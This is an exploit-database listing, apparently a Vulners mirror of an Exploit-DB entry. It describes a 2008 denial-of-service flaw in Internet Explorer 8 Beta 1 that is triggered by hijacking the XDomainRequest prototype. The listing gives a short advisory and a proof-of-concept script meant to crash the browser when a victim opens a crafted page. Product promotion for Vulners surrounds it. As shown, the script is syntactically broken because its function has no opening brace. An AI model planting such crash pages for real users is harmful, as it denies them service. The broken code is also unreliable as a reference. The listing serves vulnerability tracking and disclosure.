Lucene search
+L

Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service

🗓️ 02 Apr 2008 00:00:00Reported by The Hacker WebzineType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Microsoft Internet Explorer 8 Beta 1 Denial of Service due to XDR Prototype Hijackin

Code
source: https://www.securityfocus.com/bid/28580/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

An attacker may exploit this issue by enticing victims into opening a maliciously crafted webpage.

Successfully exploiting this issue will allow attackers to crash the application, denying service to legitimate users.

This issue affects Microsoft Internet Explorer 8 Beta 1.

<script>

// trying prototype hijacking here.

xdr = XDomainRequest;

XDomainRequest = function()

return new XDomainRequest();

}



ping = 'hello';

xdr = new XDomainRequest();

xdr.open("POST", "http://cnn.com");

xdr.send(ping);



</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Feb 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
21